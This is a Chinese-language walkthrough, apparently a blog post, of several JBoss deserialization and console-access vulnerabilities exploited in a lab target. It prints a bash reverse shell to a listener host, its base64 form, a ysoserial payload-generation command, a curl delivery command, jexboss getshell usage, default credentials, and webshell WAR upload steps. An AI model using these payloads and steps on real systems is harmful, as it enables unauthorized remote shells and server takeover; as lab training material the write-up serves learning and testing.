常见中间件漏洞攻略-Jboss篇

一、CVE-2015-7501-Jboss JMXInvokerServlet 反序列化漏洞

第一步:开启靶场
第二步:访问该接口,发现直接下载,说明接⼝开放,此接⼝存在反序列化漏洞
复制代码
http://47.103.81.25:8080/invoker/JMXInvokerServlet
第三步:准备ysoserial⼯具进⾏漏洞利⽤,将反弹shell进⾏base64编码
复制代码
#反弹shell
bash -i >& /dev/tcp/47.103.81.25/8888 0>&1

#64base编码
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx

#命令使用工具生成恶意文件
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx}|{base64,-d}|{bash,-i} ">exp.ser
第四步:服务器开启监听,终端执行命令,成功反弹shell
复制代码
#执行命令
curl http://47.103.81.25:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

二、CVE-2017-7504-JBossMQ JMS 反序列化漏洞

第一步:开启靶场
第二步:访问漏洞靶场
复制代码
#漏洞靶场
http://47.103.81.25:8080/jbossmq-httpil/HTTPServerILServlet
第三步:准备jexboss工具包,geshell
复制代码
#运行工具,getshell
python3 jexboss.py -u http://47.103.81.25:8080

三、CVE-2017-12149-JBoss 5.x/6.x反序列化漏洞

第一步:开启靶场
第二步:验证是否存在漏洞
复制代码
#漏洞存在地址
http://47.103.81.25:8080/invoker/readonly

#响应码500 --- 服务器内部错误,无法完成请求 --- 说明⻚⾯存在,此⻚⾯存在反序列化漏洞
#服务器将⽤户post请求内容进⾏反序列化
第三步:使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell

四、Administration Console弱⼝令

第一步:登陆后台
复制代码
#后台地址
http://47.103.81.25:8080/admin-console/login.seam

#用户名密码
admin:vulhub
第二步:点击web应用,上传后门文件shell.war
第三步:连接webshell
复制代码
#shell.jsp地址
http://47.103.81.25:8080/shell/shell.jsp

五、低版本JMX Console未授权

第一步:开启靶场
复制代码
#URL
http://47.103.81.25:8080/jmx-console/

#用户名密码
admin:amdin
第二步:准备通过URL的⽅式远程部署war包
第三步:将后门文件war包上传至云服务器,并测试能否顺利访问到
第四步:填写war包地址,点击invoke跳转
第五步:连接webshell
复制代码
#URL
http://47.103.81.25:8080/shell/shell.jsp	w

六、高版本JMX Console未授权

第一步:开启靶场
复制代码
#URL
http://47.103.81.25:8080/jmx-console/
第二步:准备通过URL的⽅式远程部署war包cmd.war
第三步:连接webshell
复制代码
#URL
http://47.103.81.25:8080/cmd/shell.jsp

FROM IYU_

相关推荐
介一安全1 小时前
【APK安全】组件安全核心风险与防御指南
网络安全·安全性测试·apk安全
lypzcgf3 小时前
Coze源码分析-资源库-编辑插件-后端源码-安全与错误处理
安全·插件·coze·coze源码分析·智能体平台·ai应用平台·agent平台
粟悟饭&龟波功4 小时前
【网络安全】一、入门篇:读懂 HTTP 协议
安全·web安全·http
骥龙4 小时前
粤港澳全运会网络安全防御体系深度解析:威胁态势与实战防护
网络·安全·web安全
野熊佩骑4 小时前
一文读懂Redis之数据持久化
linux·运维·数据库·redis·缓存·中间件·centos
安娜的信息安全说6 小时前
企业身份认证系统选型:Azure AD 与 Keycloak 功能详解
安全·microsoft·keycloak·azure ad
介一安全7 小时前
【APK安全】系统管理器安全风险与防御指南
网络安全·安全性测试·apk安全·android测试
安当加密7 小时前
SLA操作系统双因素认证实现Windows远程桌面OTP双因子安全登录—从零搭建企业级RDP安全加固体系
windows·安全
你的人类朋友8 小时前
HTTP请求结合HMAC增加安全性
前端·后端·安全
Dest1ny-安全10 小时前
2025年,今后需要进步的方面
安全